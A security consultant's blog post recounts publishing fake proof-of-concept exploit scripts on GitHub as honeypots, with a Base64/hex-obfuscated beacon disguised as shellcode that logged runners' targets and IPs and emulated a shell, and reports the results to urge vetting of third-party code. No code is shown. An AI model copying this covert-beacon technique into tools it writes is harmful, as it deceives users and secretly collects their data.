“TrstdXploitz” by “L33terman6000”
I’ve been wanting to perform an experiment for some time now and finally got around to it. I present to you what I think is a unique spin on an old idea, a new type of honeypot. Follow along as I explain the adventure that unfolded, including personal threats, Distributed Denial of Service attacks, the Dark Web, and some shocking statistics! Warning: Some egos were likely harmed during the making of this blog.
As a Security Consultant, I’m always advising my clients during web application security assessments to review third party code before merging it in with their code. I’ve written another blog about not trusting appliances or software on your network just because they claim to help with security. As a penetration tester I often rely on third party scripts and tools to help me do my day-to-day job, as do our blue team counterparts. It seems everyone in the Cyber Security industry does, thanks to the vast number of open-source contributions available to the community. When we forensically analyze malware we take precautions in order to avoid infection for ourselves and our clients. Why then, do we feel so comfortable running our infosec tools without checking the source? Is it because they’re open source and we assume something would have been caught? Is it due to the widespread use or the fact that someone well known in the industry shared it? Is it because of where we got it from? Just to be clear, I’m not above any of you that may be guilty of this. I’m just as much at risk as anyone else.. which got me thinking.
As many pentesters do, I often come across new vulnerabilities in customers’ environments which do not yet have weaponized exploit code available in our favorite exploitation frameworks. I turn to Proof of Concepts (PoC’s) in places such as Exploit-DB and GitHub to see if I can snag something I can use or re-author for my purposes. I know Exploit-DB and GitHub both do some work to validate and filter out malware, and with stars and watchers you can get a sense of how popular the code is. Most exploit code looks pretty similar, with a string of hex characters used as shellcode as part of the payload, and is often written in Python, Ruby, Go, Bash, etc.
I’ve always been a little skeptical of running these Proof of Concepts/Exploits because these “researchers” are also “hackers”, by definition. It’s a little of a grey area for some who research during the day and moonlight as black hats. I try to take the time to look over the code, at least at a high level, to try and understand what it is that’s taking place. If there’s hex or another encoding method used I do my best to deobfuscate and study it. I’ll admit, my effort isn’t always 100% but enough to make me feel comfortable with running it, at least locally. There’s always this fear in the back of my mind that by getting access to a remote machine, am I unintentionally handing a back door over to a black hat somewhere? Am I infecting my machine, with client data, or worse.. my client’s environment? This is a BIG responsibility for the security professional that often goes unchecked.
Our clients trust us to keep their environments safe. I’ve had clients in the past who insisted we provide a list of all tools up front that had to be approved and deployed for us beforehand. This seemed overkill to me at the time and a major obstacle when in the moment you just need to run ad hoc based on what you encounter at the time. Now, I’m not so sure. Do you feel confident your actions won’t do the opposite? Do you thoroughly review all code before you run it? Do you assume it’s okay because that security professional you follow on Twitter, having seven thousand followers, says you should try it out? (Hint for later on, the answer is no) Security customers reading this and even some security folks are probably thinking this is a no-brainier, that the answers to these questions is a resounding “YES”! I’m here to say you might just be surprised.
Of all the open-source security tools I execute on a daily basis, PoC exploit code gives me the most hesitation. If I’m being honest, I don’t always fully understand exactly what’s going on behind the scenes in order for an exploit, especially Remote Code Execution (RCE), to work. In most cases there is raw shellcode passed along as part of the payload to establish the reverse bind shell with the client-side script, which can be a little intimidating to look at. The exploit script itself may be written in a language you aren’t as familiar with. (For me that would be Ruby) I was curious how many different types of people use third-party exploit code and how many also don’t inspect the code. Also, would anyone willingly promote it without having to advertise it? I’ve noticed malware and vulnerability researchers are often the first to point out whenever there’s a working PoC for a high profile vulnerability, such as BlueKeep, in recent history. I had always assumed black hats, who make their money on exploitation, must be keeping an proactive eye on these somehow. I wanted to know more and see if there was a teachable moment here for all of us, so I came up with an experiment.
This article by TechTarget contains my favorite definition of a traditional Honeypot:
“A honeypot is a network-attached system set up as a decoy to lure cyberattackers and to detect, deflect or study hacking attempts in order to gain unauthorized access to information systems. The function of a honeypot is to represent itself on the internet as a potential target for attackers — usually a server or other high-value target — and to gather information and notify defenders of any attempts to access the honeypot by unauthorized users.”
If we want to study the behaviors of both white hat researchers and black hat hackers, it sounds like we could use a honeypot. However, this wouldn’t be a honeypot in the traditional sense since the server isn’t sitting somewhere in an environment waiting to be attacked. Instead, the exploit code itself could be booby-trapped to make it appear the target the attacker has in mind is itself vulnerable and being actively exploited. In the beginning of this thought experiment I realized I could obtain useful information about the attack, such as the vulnerable target. We don’t have to deploy this anywhere, people are willingly giving us useful information and thinking they’re connecting to these targets successfully. (I can only imagine the roller coaster of emotions. So sorry!) If we could monitor these targets in real time we could potentially keep an eye out for victims to warn or to proactively monitor against our own client’s networks. Also, if I provided a fake argument with my script to specify a “local host” for the reverse bind shell to connect back to, I could build a list of Command and Control servers that may otherwise not be known to the world. Lastly, if I collect the WAN IP address of every request in addition to the “lhost” IP address, I may even know the real IP address of the attacker or researcher, assuming they’re not hiding behind a VPN. This might be helpful one day to authorities in stopping attacks or, for my research, could help to identify any organizations which are consulting firms or potential clients of security professionals.
My initial idea was to craft a fake PoC Python script for a sought after CVE and model it after a legitimate one. For anyone looking through the code at a high level, it needed to appear that it was making a request to the targets in the supplied input, but it needed to secretly make another call to a back-end HTTP server which I control in order to collect metadata. To do this, I figured I would obfuscate that portion of the code using a combination of hex and Base64 encoding and make it look like shell code for the payload. The string would be concatenated and use custom delimiter characters to slow down reversing efforts a little.
I would research current critical Windows RCE CVE’s, host the PoC out on GitHub, and wait to see if someone would eventually search for it, without actively advertising anything. What I didn’t anticipate, was how much this metadata project would evolve into a fully-fledged honeypot/terminal emulator of its own in an attempt to get more data and Indicators of Compromise (IOC’s). I also ran into issues with supporting legacy code versions due to a lack of foresight in regards to not being in control of my own repositories.
For those that don’t care about this section, I understand, you may skip along to the statistics and outcomes of the experiment below. However, I want to talk briefly about the setup, as I originally planned to release the source for the front-end and back-end code but have since decided not to. I made this choice out of consideration for research teams who track legitimate exploits and to not contribute to more malicious attacks, like back doors being added. This experiment apparently shook things up for research teams and unexpectedly made things difficult for them, which to me just shows how fragile this current system of exploit validating and reporting is.
The client-side code, as pictured above, simply requests input from the user and sends an HTTP request to a PHP web server. The PHP then does a number of things dynamically, but the first thing it does is validate the input and source (python), then throws the entire raw command line argument into a MySQL database. The back-end records the IP address which made the requests and inserts a timestamp as well. Initially, this is all that would happen, followed by a “Sleep(10)” and a “Connection Terminated: Timeout” message on the client. This allowed me to collect the information previously discussed and appeared to be a faulty PoC to the user.
As I thought more about this, the web request was already being made to the server and if I made it respond to that request, instead of just accepting input, I could print that back to the client. Since the PHP could be dynamic based on the argument supplied, I could create a series of “If” statements that respond differently to simulate a Windows terminal, making it look like a connection had actually been established. This could all be done on the back-end as to not increase the payload size in the PoC script, potentially tipping someone off. The python script would loop through responses from the web server until no output was returned, so I could terminate the session with a “timeout” still. This was key because my intent was to make the session seem unstable, encouraging the user to establish their own remote shell for better availability and functionality. I even dropped hints that the server had been used that way already, previously compromised with empire launchers (empire_lnchr.bat) and Covenant grunts (grunt.exe). What I eventually had was a shell emulator for both Windows (based on CVE) and Linux, which was entirely done via a web requests. I considered taking this a step further and use it as an HTTP proxy against a real windows VM in an isolated environment, but decided I didn’t need to make it that involved. The goal now was to see if I could get the black hats to provide payloads for their malware, which I could then analyze in a VM. I also got a lot of great input into what commands were run in the wild and could create support for the most common ones as I went along, without changing any of the front-end code. This was key, because I learned that my repositories were being forked at an alarming rate with old code and I no longer had control over those, forcing me to keep copies of back-end code available and separate instances of my database.
All of the input provided along the way made its way into the MySQL database and was output in real time to a private Slack channel, which I could monitor. The bot names were the names of the CVE scripts so I knew what source it was coming from and URLs within the messages were defanged for my safety and so that Slack wouldn’t unfurl those URLs and tip them off that their requests were being monitored.
Up and Running
What immediately caught my attention, was that after just TWO MINUTES of posting my first PoC to GitHub I was starting to get requests. This told me that either black hats, research groups, or both, must have proactive scripts set up to scrape GitHub and various sources for their favorite CVE wish-lists based on the repository name alone. Google wouldn’t have been able to spider the page that quickly. This makes sense to me, especially for financially motivated attackers who need to move quickly and be the first to compromise. I originally expected pentesters such as myself to Google or search GitHub on an as-needed basis, as they came across the vulnerability in an environment. Black hats could likely leverage Shodan or some other source to script the exploitation of multiple vulnerable hosts, which I seemed to have witnessed on at least one occasion.
I noticed a pattern in which several people stopped using the script after issuing the “ipconfig” command previously. I realized that the output wasn’t believable since they were providing either a local or public IP address and it wasn’t in the output. This was easy to fix since the PHP was accepting the IP as input, so I could reflect it back out in the right place in the output, even changing the last octet to “1” to look like the gateway.
Once the experience kept people interacting for a while and appeared legitimate to them, there was a sharp increase in the amount of malicious payloads sent. Specifically, some of the same PowerShell commands I recently witnessed in an Incident Response (IR) engagement were used here to download Cobalt Strike droppers which would run in memory to establish a new back door. The attackers, from IR investigations, would then typically push other malware like ransomware to other areas of the network using the SMB protocol. Since my terminal wasn’t real, it never made the connection back home and was likely assumed blocked by outbound filters, local AV, or found out as a honeypot.
Since it is not a comprehensive honeypot, many people did eventually discover it was a hoax and I received some less than pleasant parameter messages for me and DDoS attacks, which honestly, was a fun challenge. Keeping a little EC2 micro instance standing against black hats trying to take it down in real time was like defending a little house against the big bad wolves. I came up with some unique ways of dynamically adding them to iptables and excluding junk data from ever reaching Slack or the database which worked well. I also responded with a 404 if the request was not from python, which helped to weed out the majority of the less dedicated attacks.
To my astonishment, well-known individuals in the security community were seemingly convinced my script was legitimate, perhaps based on the output, and shared it with their communities, speeding up the rate of clones and forks. I started getting thousands of requests per day! Other researchers were quick to point out that this was a honeypot. :)
Fortunately in my experiment I was contacted by some white hat security researchers, asking if I had committed the original code. Quentin Herrera (@paragonsec) and Muffinman (@uewuiffnw) were the first blue teamers to reach out and ask me what was going on. I gained a new perspective from both of them and learned there are some great people out there who are actively hunting for malicious exploits, even though it got by large threat intelligence teams initially like Inskit Group (Recorded Future).
Recorded Future released their internal post on April 22nd and was quickly tweeted by S21SEC. If you look at the spike in traffic both in GitHub and my database instance, I owe the largest portion of my traffic to that that initial communication from S21SEC since Recorded Future is such a trusted resource for the community.
To their credit, Recorded Future has sense been in touch with me to confirm the note pictured here was later updated to reflect the CVE was a honeypot (April 24th). The note was then removed from their platform altogether on April 27.
It wasn’t just that communication from Recorded Future though which contributed to the popularity of my repositories. My alter-ego was cited by Vulnmon for the CVE and I received mention from Perch Security and a number of Chinese websites, which I was able to determine based on referer traffic on my GitHub repository analytics. Most of these were removed as soon as Muffinman (Do you know the Muffinman?) reported it to them as well.
As expected there were social media posts outside of just Twitter, including LinkedIn and Facebook. LinkedIn was particularly interesting because I could see who reacted to the posts and cross reference their role as pentesters, along with their organization’s IP space, against my collected IP addresses to get an idea of who was running the script. Among the list of security companies who showed up in my data collection at some point, to name a few, included Checkpoint Security, Palo Alto, Verizon, and Cigital (trying to dump lsass via ProcDump). Some of these IP addresses were from internal to internal hosts, suggesting they were either testing the script (unlikely because it would be isolated) or they were using it in a client’s environment. I later ran a script against public IP’s captured to look against whois for any “Org Name” that was familiar to me. Again my intent isn’t to pick on any one person or company, but it was shocking to see how willingly people either publicized the PoC without analyzing it first or ran it on faith.
I did also submit one of my PoC scripts to Exploit-DB.com in an attempt to see if it would end up there, but it must have been caught by the Offensive Security team. Kudos to them, because that would have been a pretty trusted source for a lot of people. They have a “verified” attribute for their scripts, so its reasonable to assume with enough effort to obfuscate or use security by obscurity you could get it past them.
You may be wondering by now how many people would run untrusted code. Thanks to GitHub analytics, I can get a pretty good picture of roughly how many unique individuals are cloning my repositories and from which resources they’re arriving from. Keep in mind this experiment ran for only TEN DAYS! Not all of the repositories are even that old. You can imagine how many hits there would be if this was continuous or if CVE repositories were pushed automatically via a script every time a new RCE came out… In all I only used 7 repositories for malicious CVE’s and I had 48 followers total. This is already more than I have in my personal account, just within a little over a week.
Thanks, GitHub! Now let’s look at some interesting charts derived from data collected in that MySQL database. In these ten days, as of this writing, there were 3,294 rows of data collected from script executions in those seven repositories. My phone continues to ding from Slack alerts as I write this.
You can see above that each CVE had a bit of a shelf life and was typically most popular towards the beginning. This is likely due to researchers and black hats acting quickly and then sharing with their communities that they were fakes. I would expect to see penetration testers stumble across these at a steady rate, although much lower, for a longer period of time. Its also worth noting that some exploits are much more sought after than others due to factors like ease of exploitability, criticality (CVSS rating), the number of vulnerable targets in scope, etc. Once I implemented the honeypot functionality later on it was interesting to see things like most common commands.
Hint, China wins with US in second place. This data may look skewed because you have to remember not every request was using proper syntax with the “-lhost” and “-target” switches, and just the initial requests for the honeypot contained those arguments. All subsequent requests count as requests against those targets which is why you see much larger numbers in the last chart above for WAN IP addresses.
Now, although I got a good laugh at some of the commands and repeated attempts to use “ls” on a Windows machine, of which I’m responsible more times than I care to admit, the point of this exercise was to provide a teachable moment for researchers and look at honeypots from a different angle, possibly shedding some new light into black hat activities. Hopefully now everyone will at least give a second thought when running a script that promises to give you access to a target which is otherwise inaccessible.
With this specific script, learning how to do some basic reverse engineering is key to seeing what’s happening under the hood. For example, if you remove everything except for the payload and simply print it to the terminal instead of executing it, you can get an idea of what’s really going on. Also, if you’re hesitant you can run it in an isolated environment, such as a VM like one researcher told me they did. They used Wireshark to show what was going on behind the scenes without letting it reach my server.
In my case, I also Base64 encoded the URL for a little bit of extra obfuscation. Decoding that in the terminal below gives you the entire payload in plaintext.
Spending a little time to study the code, you should be able to determine (even with deceptively named variables) that this code isn’t doing what it claims to be doing, but instead making an HTTP request with input parameters.
To wrap this up, I urge everyone to please never assume the code you’re using is trusted. As I demonstrated above, it may be intentionally malicious. In my project, what if I had simply modified the python script to execute any code returned by the HTTP response in a variable? I could have actively executed code on those user’s machines instead of just returning text for an emulated terminal. Shells for days, and on security professional’s machines, no less.
Even if open source code is from a trusted source, we see examples all of the time where malicious components find their way into the main branch without the author’s knowledge. There’s also a chance if exploit code is from a source like Exploit-DB or even if everyone’s favorite researcher recommends it, the malicious component got past them and simply looked legitimate enough to pass along. Yes, it is a pain to comb through and its not always practical for large tool sets, such as Metasploit Framework. However, this is entirely doable for the majority of scripts that we penetration testers rely on. We need to at least do our due diligence just like we do with closed-source binaries. I’d also like to see us as a community slow down a bit when a new exploit pops up and come up with a better process for vetting them. At the most extreme level, perhaps organizations should vet software used by penetration teams and make risk determinations in the same manner any other software run on organization systems are, by a change advisory board. I don’t think we need to handicap our red teams, but perhaps new tools should be reviewed while keeping a running list of approved ones, putting extra scrutiny on anything new.
Let’s keep ourselves and our customer’s environments safe! Thanks everyone for your time!
P.S. When I published this blog I took down my repositories and terminated the server. If you ran my code, I hope you’ll forgive me for any time loss and anxiety caused by figuring out it wasn’t legitimate. I can assure you only data was collected for these statistics and will not be shared with anyone. If you ran it post 4/27/20 the server isn’t accessible and isn’t collecting anything.
Shortly after releasing this blog, another security researcher (@patrickriggs) posted his perspective as a victim of this honeypot. His account is beautifully written, has a humble approach, and it’s certainly worth a read @ https://patrickriggs.com/blog/a-tale-of-two-pocs-or-how-i-learned-to-stop-worrying-and-love-the-honeypot/.